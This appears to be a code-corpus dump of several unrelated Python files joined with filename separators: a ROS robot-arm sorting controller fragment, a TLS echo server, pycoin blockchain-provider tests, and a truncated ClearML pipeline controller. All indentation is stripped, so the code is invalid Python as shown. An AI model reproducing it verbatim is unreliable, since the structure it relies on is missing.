def bin_plan(self):
"""
Place-planning for the bins.
"""
colour_code = '' # Terminal Colour Code
bin_name = ""
# Obtain colour/priority of package
if self.order["Priority"] == "HP":
bin_name = "r"
ship_time = datetime.timedelta(days=1)
colour_code = '91'
elif self.order["Priority"] == "MP":
bin_name = "y"
ship_time = datetime.timedelta(days=3)
colour_code = '93'
elif self.order["Priority"] == "LP":
bin_name = "g"
ship_time = datetime.timedelta(days=5)
colour_code = '92'
# Travel to bin
UR5.moveit_play_planned_path_from_file(UR5.file_path +
'ur5_2/', 'home_to_%s.yaml' % bin_name[0])
# Deactivate the Gripper
os.system\
(
'rosservice call /eyrc/vb/ur5/activate_vacuum_gripper/ur5_2 "activate_vacuum_gripper: false"\n'
)
# Log the operation
if bin_name == 'r':
colour_code = '91'
elif bin_name == 'y':
colour_code = '93'
elif bin_name == 'g':
colour_code = '92'
rospy.loginfo(
'\033[{}m{} Package with order ID {} shipped! \033[0m'.format(
colour_code, self.order["Priority"],
self.order["Order ID"]))
ship_instant = datetime.datetime.now()
# Update order shipping status
order = {"id": "OrdersShipped",
"Team Id": "VB#1202",
"Unique Id": "isAmiTvb",
"Order ID": self.order["Order ID"],
"City": self.order["City"],
"Item": self.order["Item"],
"Priority": self.order["Priority"],
"Shipped Quantity": self.order["Dispatch Quantity"],
"Cost": self.order["Cost"],
"Shipped Status": "YES",
"Shipped Date and Time": ship_instant.strftime("%Y-%m-%d %H:%M:%S"),
"Estimated Time of Delivery": (ship_instant + ship_time).strftime("%d-%m-%Y")}
# Updating Spreadsheet
ACTION_CLIENT.send_goal_pls(order)
# Travel to home
UR5.moveit_play_planned_path_from_file(UR5.file_path + 'ur5_2/',
'%s_to_home.yaml' % bin_name[0])
def controller(self):
"""
Executes the main operations, coordinating the UR5_2.
"""
# Go to home position
UR5.moveit_play_planned_path_from_file(UR5.file_path + 'ur5_2/', 'zero_to_home.yaml')
# Execute planning
while not rospy.is_shutdown():
try:
if ('packagen' in self.package_name) and self.ready_flag: # When box detected
box_plan(self.package_name, ENV_VALUES[0], ENV_VALUES[1])
self.bin_plan() # Execute place operation
self.package_colours.pop(0) # Removing item from list
self.ready_flag = False # Signalling conveyor
except ROSInterruptException:
quit()
if __name__ == '__main__':
rospy.sleep(10)
UR5 = Ur5Moveit("ur5_2") # Initialise the UR5_2
ACTION_CLIENT = RosIotBridgeActionClient() # Start the ROS-IoT Bridge
UR5_2 = UR5Two()
# Start the separate conveyor control thread
T = threading.Thread(target=UR5_2.smart_stop)
T.start()
# Obtain prerequisite data
ENV_VALUES = env_data()
# Start execution
UR5_2.controller()
|
threadsslecho.py | # Copied from https://github.com/dabeaz/curio/blob/master/examples/bench/threadecho.py
# A simple echo server with threads
from socket import *
from threading import Thread
import ssl
import os
path = os.path.dirname(os.path.abspath(__file__))
KEYFILE = os.path.join(path, "ssl_test_rsa") # Private key
CERTFILE = os.path.join(path, "ssl_test.crt") # Certificate (self-signed)
def echo_server(addr):
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind(addr)
sock.listen(5)
while True:
client, addr = sock.accept()
Thread(target=echo_handler, args=(client, addr), daemon=True).start()
def echo_handler(client, addr):
print('Connection from', addr)
client.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ssl_context.load_cert_chain(certfile=CERTFILE, keyfile=KEYFILE)
client = ssl_context.wrap_socket(client, server_side=True)
with client:
while True:
data = client.recv(100000)
if not data:
break
client.sendall(data)
print('Connection closed')
if __name__ == '__main__':
echo_server(('', 25000))
|
services_test.py |
import threading
import unittest
from pycoin.encoding.hexbytes import h2b_rev
from pycoin.services import providers
from pycoin.services.blockchain_info import BlockchainInfoProvider
from pycoin.services.blockcypher import BlockcypherProvider
from pycoin.services.blockexplorer import BlockExplorerProvider
from pycoin.services.chain_so import ChainSoProvider
from pycoin.services.insight import InsightProvider
BLOCK_0_HASH = h2b_rev("000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f")
BLOCK_1_HASH = h2b_rev("00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048")
tx_id_for_net = {
"BTC": ["b958e4a3ccd5bc8fe0ff6fafd635199313e347b88a8102040c05dd123f32a4f3",
"d1ef46055a84fd02ee82580d691064780def18614d98646371c3448ca20019ac",
"69916297f7adde13457b8244e2d704966097e9519ec8fd6f2e7af8c2a60f70f2",
"c586389e5e4b3acb9d6c8be1c19ae8ab2795397633176f5a6442a261bbdefc3a"],
"XTN": ["4586e67ee5adcdbc97ed3d2a026ee8703df2ed3553854c186c216e90cd761b69"],
"DOGE": ["ed7df4e7506ac8447b6983c8ad79da1af86cddda0ff012f7db83e664f61ef6cf"],
"XDT": ["19dd5c3423e606b5b5dd30b070688bdf9af27fa736e8f3aeb2b68d92a50e67ef"],
}
class ServicesTest(unittest.TestCase):
def test_env(self):
CS = "blockchain.info blockexplorer.com chain.so insight:https://hostname/url"
provider_list = providers.providers_for_config_string(CS, "BTC")
self.assertEqual(len(provider_list), len(CS.split()))
def test_thread_provider(self):
p_list_1 = providers.providers_for_config_string("blockchain.info", "BTC")
p_list_2 = providers.providers_for_config_string("blockexplorer.com", "BTC")
providers.set_default_providers_for_netcode("BTC", p_list_1)
self.assertEqual(providers.get_default_providers_for_netcode("BTC"), p_list_1)
# use a dictionary so it can be mutable in the subthread
d = {"is_ok": False}
def subthread():
providers.set_default_providers_for_netcode("BTC", [])
self.assertEqual(providers.get_default_providers_for_netcode("BTC"), [])
providers.set_default_providers_for_netcode("BTC", p_list_2)
self.assertEqual(providers.get_default_providers_for_netcode("BTC"), p_list_2)
d["is_ok"] = True
t = threading.Thread(target=subthread)
t.start()
t.join()
self.assertTrue(d["is_ok"])
self.assertEqual(providers.get_default_providers_for_netcode("BTC"), p_list_1)
def check_provider_tx_for_tx_hash(self, p, networks):
for net in networks:
b = p(net)
for tx_id in tx_id_for_net[net]:
tx = b.tx_for_tx_hash(h2b_rev(tx_id))
self.assertEqual(tx.id(), tx_id)
def test_BitcoindProvider(self):
# not sure what to do here, as there is no open bitcoind provider I know of
pass
def test_BlockchainInfo(self):
self.check_provider_tx_for_tx_hash(BlockchainInfoProvider, ["BTC"])
@unittest.skip("this test is not working for some reason")
def test_BlockCypherProvider(self):
self.check_provider_tx_for_tx_hash(BlockcypherProvider, ["BTC", "XTN"])
@unittest.skip("this test is not working for some reason")
def test_BlockExplorerProvider(self):
self.check_provider_tx_for_tx_hash(BlockExplorerProvider, ["BTC"])
@unittest.skip("this test is causing problems in travis-ci because chain_so thinks it's a DOS attack")
def test_ChainSoProvider(self):
self.check_provider_tx_for_tx_hash(ChainSoProvider, ["BTC", "XTN", "DOGE", "XDT"])
def test_InsightProvider(self):
provider = InsightProvider("http://insight.bitpay.com/api/")
self.check_provider_tx_for_tx_hash(lambda x: provider, ["BTC"])
provider.get_blockchain_tip()
h = provider.get_blockheader(BLOCK_1_HASH)
assert h.previous_block_hash == BLOCK_0_HASH
height = provider.get_block_height(BLOCK_1_HASH)
assert height == 1
def main():
unittest.main()
if __name__ == "__main__":
main()
|
controller.py | import re
from copy import copy
from datetime import datetime
from logging import getLogger
from threading import Thread, Event, RLock
from time import time
from attr import attrib, attrs
from typing import Sequence, Optional, Mapping, Callable, Any, Union, List
from ..backend_interface.util import get_or_create_project
from ..debugging.log import LoggerRoot
from ..task import Task
from ..automation import ClearmlJob
from ..model import BaseModel
from ..utilities.process.mp import leave_process
class PipelineController(object):
"""
Pipeline controller.
Pipeline is a DAG of base tasks, each task will be cloned (arguments changed as required) executed and monitored
The pipeline process (task) itself can be executed manually or by the clearml-agent services queue.
Notice: The pipeline controller lives as long as the pipeline itself is being executed.
"""
_tag = 'pipeline'
_step_pattern = r"\${[^}]*}"
_config_section = 'Pipeline'
_task_project_lookup = {}
@attrs
class Node(object):
name = attrib(type=str)
base_task_id = attrib(type=str)
queue = attrib(type=str, default=None)
parents = attrib(type=list, default=[])
timeout = attrib(type=float, default=None)
parameters = attrib(type=dict, default={})
task_overrides = attrib(type=dict, default={})
executed = attrib(type=str, default=None)
clone_task = attrib(type=bool, default=True)
job = attrib(type=ClearmlJob, default=None)
skip_job = attrib(type=bool, default=False)
cache_executed_step = attrib(type=bool, default=False)
def __init__(
self,
pool_frequency=0.2, # type: float
default_execution_queue=None, # type: Optional[str]
pipeline_time_limit=None, # type: Optional[float]
auto_connect_task=True, # type: Union[bool, Task]
always_create_task=False, # type: bool
add_pipeline_tags=False, # type: bool
target_project=None, # type: Optional[str]
pipeline_name=None, # type: Optional[str]
pipeline_project=None, # type: Optional[str]
):
# type: (...) -> ()
"""
Create a new pipeline controller. The newly created object will launch and monitor the new experiments.
:param float pool_frequency: The pooling frequency (in minutes) for monitoring experiments / states.
:param str default_execution_queue: The execution queue to use if no execution queue is provided
:param float pipeline_time_limit: The maximum time (minutes) for the entire pipeline process. The
default is ``None``, indicating no time limit.
:param bool auto_connect_task: Store pipeline arguments and configuration in the Task
- ``True`` - The pipeline argument and configuration will be stored in the current Task. All arguments will
be under the hyper-parameter section ``Pipeline``, and the pipeline DAG will be stored as a
Task configuration object named ``Pipeline``.
Notice that when running remotely the DAG definitions will be taken from the Task itself (e.g. editing
the configuration in the UI will be reflected in the actual DAG created).
- ``False`` - Do not store DAG configuration on the Task.
In remote execution the DAG will always be created from code.
- ``Task`` - A specific Task object to connect the pipeline with.
:param bool always_create_task: Always create a new Task
- ``True`` - No current Task initialized. Create a new task named ``Pipeline`` in the ``base_task_id``
project.
- ``False`` - Use the :py:meth:`task.Task.current_task` (if exists) to report statistics.
:param bool add_pipeline_tags: (default: False) if True, add `pipe: <pipeline_task_id>` tag to all
steps (Tasks) created by this pipeline.
:param str target_project: If provided, all pipeline steps are cloned into the target project
:param pipeline_name: Optional, provide pipeline name if main Task is not present (default current date)
:param pipeline_project: Optional, provide project storing the pipeline if main Task is not present
"""
self._nodes = {}
self._running_nodes = []
self._start_time = None
self._pipeline_time_limit = pipeline_time_limit * 60. if pipeline_time_limit else None
self._default_execution_queue = default_execution_queue
self._pool_frequency = pool_frequency * 60.
self._thread = None
self._stop_event = None
self._experiment_created_cb = None
self._experiment_completed_cb = None
self._pre_step_callbacks = {}
self._post_step_callbacks = {}
self._target_project = target_project or ''
self._add_pipeline_tags = add_pipeline_tags
self._task = auto_connect_task if isinstance(auto_connect_task, Task) else Task.current_task()
self._step_ref_pattern = re.compile(self._step_pattern)
self._reporting_lock = RLock()
self._pipeline_task_status_failed = None
if not self._task and always_create_task:
self._task = Task.init(
project_name=pipeline_project or 'Pipelines',
task_name=pipeline_name or 'Pipeline {}'.format(datetime.now()),
task_type=Task.TaskTypes.controller,
)
self._auto_connect_task = bool(auto_connect_task) and bool(self._task)
# make sure we add to the main Task the pipeline tag
if self._task:
self._task.add_tags([self._tag])
def add_step(
self,
name, # type: str
base_task_id=None, # type: Optional[str]
parents=None, # type: Optional[Sequence[str]]
parameter_override=None, # type: Optional[Mapping[str, Any]]
task_overrides=None, # type: Optional[Mapping[str, Any]]
execution_queue=None, # type: Optional[str]
time_limit=None, # type: Optional[float]
base_task_project=None, # type: Optional[str]
base_task_name=None, # type: Optional[str]
clone_base_task=True, # type: bool
pre_execute_callback=None, # type: Optional[Callable[[PipelineController, PipelineController.Node, dict], bool]] # noqa
post_execute_callback=None, # type: Optional[Callable[[PipelineController, PipelineController.Node], None]] # noqa
cache_executed_step=False, # type: bool
):
# type: (...) -> bool
"""
Add a step to the pipeline execution DAG.
Each step must have a unique name (this name will later be used to address the step)
:param str name: Unique of the step. For example `stage1`
:param str base_task_id: The Task ID to use for the step. Each time the step is executed,
the base Task is cloned, then the cloned task will be sent for execution.
:param list parents: Optional list of parent nodes in the DAG.
The current step in the pipeline will be sent for execution only after all the parent nodes
have been executed successfully.
:param dict parameter_override: Optional parameter overriding dictionary.
The dict values can reference a previously executed step using the following form '${step_name}'
Examples:
- Artifact access
parameter_override={'Args/input_file': '${stage1.artifacts.mydata.url}' }
- Model access (last model used)
parameter_override={'Args/input_file': '${stage1.models.output.-1.url}' }
- Parameter access
parameter_override={'Args/input_file': '${stage3.parameters.Args/input_file}' }
- Task ID
parameter_override={'Args/input_file': '${stage3.id}' }
:param dict task_overrides: Optional task section overriding dictionary.
The dict values can reference a previously executed step using the following form '${step_name}'
Examples:
- clear git repository commit ID
parameter_override={'script.version_num': '' }
- git repository commit branch
parameter_override={'script.branch': '${stage1.script.branch}' }
- container image
parameter_override={'container.image': '${stage1.container.image}' }
:param str execution_queue: Optional, the queue to use for executing this specific step.
If not provided, the task will be sent to the default execution queue, as defined on the class
:param float time_limit: Default None, no time limit.
Step execution time limit, if exceeded the Task is aborted and the pipeline is stopped and marked failed.
:param str base_task_project: If base_task_id is not given,
use the base_task_project and base_task_name combination to retrieve the base_task_id to use for the step.
:param str base_task_name: If base_task_id is not given,
use the base_task_project and base_task_name combination to retrieve the base_task_id to use for the step.
:param bool clone_base_task: If True (default) the pipeline will clone the base task, and modify/enqueue
the cloned Task. If False, the base-task is used directly, notice it has to be in draft-mode (created).
:param Callable pre_execute_callback: Callback function, called when the step (Task) is created
and before it is sent for execution. Allows a user to modify the Task before launch.
Use `node.job` to access the ClearmlJob object, or `node.job.task` to directly access the Task object.
`parameters` are the configuration arguments passed to the ClearmlJob.
If the callback returned value is `False`,
the Node is skipped and so is any node in the DAG that relies on this node.
Notice the `parameters` are already parsed,
e.g. `${step1.parameters.Args/param}` is replaced with relevant value.
.. code-block:: py
def step_created_callback(
pipeline, # type: PipelineController,
node, # type: PipelineController.Node,
parameters, # type: dict
):
pass
:param Callable post_execute_callback: Callback function, called when a step (Task) is completed
and it other jobs are executed. Allows a user to modify the Task status after completion.
.. code-block:: py
def step_completed_callback(
pipeline, # type: PipelineController,
node, # type: PipelineController.Node,
):
pass
:param cache_executed_step: If True, before launching the new step,
after updating with the latest configuration, check if an exact Task with the same parameter/code
was already executed. If it was found, use it instead of launching a new Task.
Default: False, a new cloned copy of base_task is always used.
Notice: If the git repo reference does not have a specific commit ID, the Task will never be used.
If `clone_base_task` is False there is no cloning, hence the base_task is used.
:return: True if successful
"""
# always store callback functions (even when running remotely)
if pre_execute_callback:
self._pre_step_callbacks[name] = pre_execute_callback
if post_execute_callback:
self._post_step_callbacks[name] = post_execute_callback
# when running remotely do nothing, we will deserialize ourselves when we start
# if we are not cloning a Task, we assume this step is created from code, not from the configuration
if clone_base_task and self._has_stored_configuration():
return True
if name in self._nodes:
raise ValueError('Node named \'{}\' already exists in the pipeline dag'.format(name))
if not base_task_id:
if not base_task_project or not base_task_name:
raise ValueError('Either base_task_id or base_task_project/base_task_name must be provided')
base_task = Task.get_task(
project_name=base_task_project,
task_name=base_task_name,
allow_archived=True,
task_filter=dict(
status=[str(Task.TaskStatusEnum.created), str(Task.TaskStatusEnum.queued),
str(Task.TaskStatusEnum.in_progress), str(Task.TaskStatusEnum.published),
str(Task.TaskStatusEnum.stopped), str(Task.TaskStatusEnum.completed),
str(Task.TaskStatusEnum.closed)],
)
)
if not base_task:
raise ValueError('Could not find base_task_project={} base_task_name={}'.format(
base_task_project, base_task_name))
if Task.archived_tag in base_task.get_system_tags():
LoggerRoot.get_base_logger().warning(
'Found base_task_project={} base_task_name={} but it is archived'.format(
base_task_project, base_task_name))
base_task_id = base_task.id
self._nodes[name] = self.Node(
name=name, base_task_id=base_task_id, parents=parents or [],
queue=execution_queue, timeout=time_limit,
parameters=parameter_override or {},
clone_task=clone_base_task,
task_overrides=task_overrides,
cache_executed_step=cache_executed_step,
)
if self._task and not self._task.running_locally():
self.update_execution_plot()
return True
def start(
self,
step_task_created_callback=None, # type: Optional[Callable[[PipelineController, PipelineController.Node, dict], bool]] # noqa
step_task_completed_callback=None # type: Optional[Callable[[PipelineController, PipelineController.Node], None]] # noqa
):
# type: (...) -> bool
"""
Start the pipeline controller.
If the calling process is stopped, then the controller stops as well.
:param Callable step_task_created_callback: Callback function, called when a step (Task) is created
and before it is sent for execution. Allows a user to modify the Task before launch.
Use `node.job` to access the ClearmlJob object, or `node.job.task` to directly access the Task object.
`parameters` are the configuration arguments passed to the ClearmlJob.
If the callback returned value is `False`,
the Node is skipped and so is any node in the DAG that relies on this node.
Notice the `parameters` are already parsed,
e.g. `${step1.parameters.Args/param}` is replaced with relevant value.
.. code-block:: py
def step_created_callback(
pipeline, # type: PipelineController,
node, # type: PipelineController.Node,
parameters, # type: dict
):
pass
:param Callable step_task_completed_callback: Callback function, called when a step (Task) is completed
and it other jobs are executed. Allows a user to modify the Task status after completion.
.. code-block:: py
def step_completed_callback(
pipeline, # type: PipelineController,
node, # type: PipelineController.Node,
):
pass
:return: True, if the controller started. False, if the controller did not start.
"""
if self._thread:
return True
params, pipeline_dag = self._serialize_pipeline_task()
# deserialize back pipeline state
if not params['continue_pipeline']:
for k in pipeline_dag:
pipeline_dag[k]['executed'] = None
self._default_execution_queue = params['default_queue']
self._add_pipeline_tags = params['add_pipeline_tags']
self._target_project = params['target_project'] or ''
self._deserialize(pipeline_dag)
# if we continue the pipeline, make sure that we re-execute failed tasks
if params['continue_pipeline']:
for node in self._nodes.values():
if node.executed is False:
node.executed = None
if not self._verify():
raise ValueError("Failed verifying pipeline execution graph, "
"it has either inaccessible nodes, or contains cycles")
self.update_execution_plot()
self._start_time = time()
self._stop_event = Event()
self._experiment_created_cb = step_task_created_callback
self._experiment_completed_cb = step_task_completed_callback
self._thread = Thread(target=self._daemon)
self._thread.daemon = True
self._thread.start()
return True
def start_remotely(self, queue='services', exit_process=True):
# type: (str, bool) -> Task
"""
Start the current pipeline remotely (on the selected services queue)
The current process will be stopped if exit_process is True.
:param queue: queue name to launch the pipeline on
:param exit_process: If True exit the current process after launching on the enqueuing on the queue
:return: The remote Task object
"""
if not self._task:
raise ValueError(
"Could not find main Task, "
"PipelineController must be created with `always_create_task=True`")
# serialize state only if we are running locally
if Task.running_locally() or not self._task.is_main_task():
self._serialize_pipeline_task()
self.update_execution_plot()
# stop current Task and execute remotely or no-op
self._task.execute_remotely(queue_name=queue, exit_process=exit_process, clone=False)
if not Task.running_locally() and self._task.is_main_task():
self.start()
self.wait()
self.stop()
leave_process(0)
else:
return self._task
def stop(self, timeout=None):
# type: (Optional[float]) -> ()
"""
Stop the pipeline controller and the optimization thread.
:param float timeout: Wait timeout for the optimization thread to exit (minutes).
The default is ``None``, indicating do not wait terminate immediately.
"""
self.wait(timeout=timeout)
if self._task and self._pipeline_task_status_failed:
print('Setting pipeline controller Task as failed (due to failed steps) !')
self._task.close()
self._task.mark_failed(status_reason='Pipeline step failed', force=True)
def wait(self, timeout=None):
# type: (Optional[float]) -> bool
"""
Wait for the pipeline to finish.
.. note::
This method does not stop the pipeline. Call :meth:`stop` to terminate the pipeline.
:param float timeout: The timeout to wait for the pipeline to complete (minutes).
If ``None``, then wait until we reached the timeout, or pipeline completed.
:return: True, if the pipeline finished. False, if the pipeline timed out.
"""
if not self.is_running():
return True
if timeout is not None:
timeout *= 60.
_thread = self._thread
_thread.join(timeout=timeout)
if _thread.is_alive():
return False
return True
def is_running(self):
# type: () -> bool
"""
return True if the pipeline controller is running.
:return: A boolean indicating whether the pipeline controller is active (still running) or stopped.
"""
return self._thread is not None and self._thread.is_alive()
def is_successful(self):
# type: () -> bool
"""
return True if the pipeline controller is fully executed and none of the steps / Tasks failed
:return: A boolean indicating whether all steps did not fail
"""
return self._thread and not self.is_running() and not self._pipeline_task_status_failed
def elapsed(self):
# type: () -> float
"""
Return minutes elapsed from controller stating time stamp.
:return: The minutes from controller start time. A negative value means the process has not started yet.
"""
if self._start_time is None:
return -1.0
return (time() - self._start_time) / 60.
def get_pipeline_dag(self):
# type: () -> Mapping[str, PipelineController.Node]
"""
Return the pipeline execution graph, each node in the DAG is PipelineController.Node object.
Graph itself is a dictionary of Nodes (key based on the Node name),
each node holds links to its parent Nodes (identified by their unique names)
:return: execution tree, as a nested dictionary. Example:
.. code-block:: py
{
'stage1' : Node() {
name: 'stage1'
job: ClearmlJob
...
},
}
"""
return self._nodes
def get_processed_nodes(self):
# type: () -> Sequence[PipelineController.Node]
"""
Return the a list of the processed pipeline nodes, each entry in the list is PipelineController.Node object.
:return: executed (excluding currently executing) nodes list
"""
return {k: n for k, n in self._nodes.items() if n.executed}
def get_running_nodes(self):
# type: () -> Sequence[PipelineController.Node]
"""
Return the a list of the currently running pipeline nodes,
each entry in the list is PipelineController.Node object.
:return: Currently running nodes list
"""
return {k: n for k, n in self._nodes.items() if k in self._running_nodes}
def update_execution_plot(self):
# type: () -> ()
"""
Update sankey diagram of the current pipeline
"""
with self._reporting_lock:
self._update_execution_plot()
def _serialize_pipeline_task(self):
# type: () -> (dict, dict)
"""
Serialize current pipeline state into the main Task
:return: params, pipeline_dag
"""
params = {'continue_pipeline': False,
'default_queue': self._default_execution_queue,
'add_pipeline_tags': self._add_pipeline_tags,
'target_project': self._target_project,
}
pipeline_dag = self._serialize()
# serialize pipeline state
if self._task and self._auto_connect_task:
self._task.connect_configuration(pipeline_dag, name=self._config_section)
self._task.connect(params, name=self._config_section)
return params, pipeline_dag
def _serialize(self):
# type: () -> dict
"""
Store the definition of the pipeline DAG into a dictionary.
This dictionary will be used to store the DAG as a configuration on the Task
:return:
"""
dag = {name: dict((k, v) for k, v in node.__dict__.items() if k not in ('job', 'name'))
for name, node in self._nodes.items()}
return dag
def _deserialize(self, dag_dict):
# type: (dict) -> ()
"""
Restore the DAG from a dictionary.
This will be used to create the DAG from the dict stored on the Task, when running remotely.
:return:
"""
# make sure that we override nodes that we do not clone.
for name in self._nodes:
if self._nodes[name].clone_task and name in dag_dict and dag_dict['name'].get('clone_task'):
dag_dict['name'] = dict(
(k, v) for k, v in self._nodes[name].__dict__.items() if k not in ('job', 'name'))
self._nodes = {
k: self.Node(name=k, **v) if not v.get('clone_task') or k not in self._nodes else self._nodes[k]
for k, v in dag_dict.items()}
def _has_stored_configuration(self):
"""
Return True if we are running remotely and we have stored configuration on the Task
"""
if self._auto_connect_task and self._task and not self._task.running_locally() and self._task.is_main_task():
stored_config = self._task.get_configuration_object(self._config_section)
return bool(stored_config)
return False
def _verify(self):
# type: () -> bool
"""
Verify the DAG, (i.e. no cycles and no missing parents)
On error raise ValueError with verification details
:return: return True iff DAG has no errors
"""
# verify nodes
for node in self._nodes.values():
# raise value error if not verified
self._verify_node(node)
# check the dag itself
if not self._verify_dag():
return False
return True
def _verify_node(self, node):
# type: (PipelineController.Node) -> bool
"""
Raise ValueError on verification errors
:return: Return True iff the specific node is verified
"""
if not node.base_task_id:
raise ValueError("Node '{}', base_task_id is empty".format(node.name))
if not self._default_execution_queue and not node.queue:
raise ValueError("Node '{}' missing execution queue, "
"no default queue defined and no specific node queue defined".format(node.name))
task = Task.get_task(task_id=node.base_task_id)
if not task:
raise ValueError("Node '{}', base_task_id={} is invalid".format(node.name, node.base_task_id))
pattern = self._step_ref_pattern
for v in node.parameters.values():
if isinstance(v, str):
for g in pattern.findall(v):
self.__verify_step_reference(node, g)
return True
def _verify_dag(self):
# type: () -> bool
"""
:return: True iff the pipeline dag is fully accessible and contains no cycles
"""
visited = set()
prev_visited = None
while prev_visited != visited:
prev_visited = copy(visited)
for k, node in self._nodes.items():
if k in visited:
continue
if not all(p in visited for p in node.parents or []):
continue
visited.add(k)
# return False if we did not cover all the nodes
return not bool(set(self._nodes.keys()) - visited)
def _launch_node(self, node):
# type: (PipelineController.Node) -> ()
"""
Launch a single node (create and enqueue a ClearmlJob)
:param node: Node to launch
:return: Return True if a new job was launched
"""
if node.job or node.executed:
return False
updated_hyper_parameters = {}
for k, v in node.parameters.items():
updated_hyper_parameters[k] = self._parse_step_ref(v)
task_overrides = self._parse_task_overrides(node.task_overrides) if node.task_overrides else None
extra_args = dict()
if self._target_project:
extra_args['project'] = get_or_create_project(
session=self._task.session if self._task else Task.default_session,
project_name=self._target_project)
skip_node = None
if self._pre_step_callbacks.get(node.name):
skip_node = self._pre_step_callbacks[node.name](self, node, updated_hyper_parameters)
if skip_node is False:
node.skip_job = True
return True
node.job = ClearmlJob(
base_task_id=node.base_task_id, parameter_override=updated_hyper_parameters,
tags=['pipe: {}'.format(self._task.id)] if self._add_pipeline_tags and self._task else None,
parent=self._task.id if self._task else None,
disable_clone_task=not node.clone_task,
task_overrides=task_overrides,
allow_caching=node.cache_executed_step,
**extra_args
)
if self._experiment_created_cb:
skip_node = self._experiment_created_cb(self, node, updated_hyper_parameters)
if skip_node is False:
# skipping node
getLogger('clearml.automation.controller').warning(
'Skipping node {} on callback request'.format(node))
# delete the job we just created
node.job.delete()
node.skip_job = True
elif node.job.is_cached_task():
node.executed = node.job.task_id()
else:
node.job.launch(queue_name=node.queue or self._default_execution_queue)
return True
def _update_execution_plot(self):
# type: () -> ()
"""
Update sankey diagram of the current pipeline
"""
if not self._task:
return
sankey_node = dict(
label=[],
color=[],
hovertemplate='%{label}<extra></extra>',
# customdata=[],
# hovertemplate='%{label}<br />Hyper-Parameters:<br />%{customdata}<extra></extra>',
)
sankey_link = dict(
source=[],
target=[],
value=[],
# hovertemplate='%{target.label}<extra></extra>',
hovertemplate='<extra></extra>',
)
visited = []
node_params = []
nodes = list(self._nodes.values())
while nodes:
next_nodes = []
for node in nodes:
if not all(p in visited for p in node.parents or []):
next_nodes.append(node)
continue
visited.append(node.name)
idx = len(visited) - 1
parents = [visited.index(p) for p in node.parents or []]
node_params.append(node.job.task_parameter_override if node.job else node.parameters) or {}
# sankey_node['label'].append(node.name)
# sankey_node['customdata'].append(
# '<br />'.join('{}: {}'.format(k, v) for k, v in (node.parameters or {}).items()))
sankey_node['label'].append(
'{}<br />'.format(node.name) +
'<br />'.join('{}: {}'.format(k, v if len(str(v)) < 24 else (str(v)[:24]+' ...'))
for k, v in (node.parameters or {}).items()))
sankey_node['color'].append(self._get_node_color(node))
for p in parents:
sankey_link['source'].append(p)
sankey_link['target'].append(idx)
sankey_link['value'].append(1)
nodes = next_nodes
# make sure we have no independent (unconnected) nodes
single_nodes = []
for i in [n for n in range(len(visited)) if n not in sankey_link['source'] and n not in sankey_link['target']]:
single_nodes.append(i)
# create the sankey graph
dag_flow = dict(
link=sankey_link,
node=sankey_node,
textfont=dict(color='rgba(0,0,0,0)', size=1),
type='sankey',
orientation='h'
)
table_values = self._build_table_report(node_params, visited)
# hack, show single node sankey
if single_nodes:
singles_flow = dict(
x=list(range(len(single_nodes))), y=[1] * len(single_nodes),
text=[v for i, v in enumerate(sankey_node['label']) if i in single_nodes],
mode='markers',
hovertemplate="%{text}<extra></extra>",
marker=dict(
color=[v for i, v in enumerate(sankey_node['color']) if i in single_nodes],
size=[40] * len(single_nodes),
),
showlegend=False,
type='scatter',
)
# only single nodes
if len(single_nodes) == len(sankey_node['label']):
fig = dict(data=[singles_flow], layout={
'hovermode': 'closest', 'xaxis': {'visible': False}, 'yaxis': {'visible': False}})
else:
dag_flow['domain'] = {'x': [0.0, 1.0], 'y': [0.2, 1.0]}
fig = dict(data=[dag_flow, singles_flow],
layout={'autosize': True,
'hovermode': 'closest',
'xaxis': {'anchor': 'y', 'domain': [0.0, 1.0], 'visible': False},
'yaxis': {'anchor': 'x', 'domain': [0.0, 0.15], 'visible': False}
})
else:
# create the sankey plot
fig = dict(data=[dag_flow], layout={'xaxis': {'visible': False}, 'yaxis': {'visible': False}})
# report DAG
self._task.get_logger().report_plotly(
title='Pipeline', series='Execution Flow', iteration=0, figure=fig)
# report detailed table
self._task.get_logger().report_table(
title='Pipeline Details', series='Execution Details', iteration=0, table_plot=table_values)
def _build_table_report(self, node_params, visited):
# type: (List, List) -> List[List]
"""
Create the detailed table report on all the jobs in the pipeline
:param node_params: list of node parameters
:param visited: list of nodes
:return: Table as List of List of strings (cell)
"""
task_link_template = self._task.get_output_log_web_page() \
.replace('/{}/'.format(self._task.project), '/{project}/') \
.replace('/{}/'.format(self._task.id), '/{task}/')
table_values = [["Pipeline Step", "Task ID", "Task Name", "Status", "Parameters"]]
for name, param in zip(visited, node_params):
param_str = str(param)
if len(param_str) > 3:
# remove {} from string
param_str = param_str[1:-1]
step_name = name
if self._nodes[name].base_task_id:
step_name += '\n[<a href="{}"> {} </a>]'.format(
task_link_template.format(project='*', task=self._nodes[name].base_task_id), 'base task')
table_values.append(
[step_name,
self.__create_task_link(self._nodes[name], task_link_template),
self._nodes[name].job.task.name if self._nodes[name].job else '',
self.__get_node_status(self._nodes[name]),
param_str]
)
return table_values
@staticmethod
def _get_node_color(node):
# type (self.Mode) -> str
"""
Return the node color based on the node/job state
:param node: A node in the pipeline
:return: string representing the color of the node (e.g. "red", "green", etc)
"""
if not node:
return ""
if node.executed is not None:
if node.job and node.job.is_failed():
return "red" # failed job
elif node.job and node.job.is_cached_task():
return "darkslateblue"
elif not node.job or node.job.is_completed():
return "blue" # completed job
else:
return "royalblue" # aborted job
elif node.job:
if node.job.is_pending():
return "#bdf5bd" # lightgreen, pending in queue
else:
return "green" # running job
elif node.skip_job:
return "gray" # skipped job
else:
return "lightsteelblue" # pending job
def _force_task_configuration_update(self):
pipeline_dag = self._serialize()
if self._task:
# noinspection PyProtectedMember
self._task._set_configuration(
name=self._config_section, config_type='dictionary', config_dict=pipeline_dag)
def _daemon(self):
# type: () -> ()
"""
The main pipeline execution loop. This loop is executed on its own dedicated thread.
:return:
"""
pooling_counter = 0
launched_nodes = set()
last_plot_report = time()
while self._stop_event:
# stop request
if self._stop_event.wait(self._pool_frequency if pooling_counter else 0.01):
break
pooling_counter += 1
# check the pipeline time limit
if self._pipeline_time_limit and (time() - self._start_time) > self._pipeline_time_limit:
break
# check the state of all current jobs
